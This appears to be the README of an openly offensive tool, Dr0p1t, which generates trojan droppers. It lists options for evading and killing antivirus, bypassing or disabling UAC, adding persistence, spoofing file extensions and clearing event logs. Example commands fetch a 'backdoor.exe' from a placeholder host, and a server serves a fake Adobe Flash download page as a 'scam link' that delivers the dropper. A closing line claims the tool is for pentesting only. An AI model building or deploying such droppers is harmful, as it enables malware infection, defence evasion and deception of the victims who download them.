Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
+ Generated executable properties:
+ Framework properties:
+ Modules:
+Persistence modules:
Still not fully tested! Need some contributors and testers :smile:
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
Note : You must have root access
There's a list here for all official videos for installing and using Dr0p1t Playlist
- On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git chmod 777 -R Dr0p1t-Framework cd Dr0p1t-Framework sudo chmod +x install.sh ./install.sh python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Note : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]
Note : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]
On Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :
python -m pip install -r server_requirements.txt
Now let's run our server script :
python Dr0p1t_Server.py
After running the server script, it will start to listen to all the connection coming to port 5000 using flask.
Now to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.
To open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.
After opening the serve page you will see a simple website with a simple design asking you for data needed See server screenshots
Then submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.
After entering the link you will see a scam to download the dropper which it by default Adobe flash download page. To replace the scam with yours replace the file "Scam.html" content with yours but remember the variables ( Don't remove it ).
See more for Windows See more for Linux
If this tool has been useful for you, feel free to thank me by buying me a coffee :)
Dr0p1t Framework not responsible for misuse and for illegal purposes. Use it only for Pentest or educational purpose !!!
Copying a code from this framework or using it in another tool is accepted as you mention where you get it from :smile:
Pull requests are always welcomed :D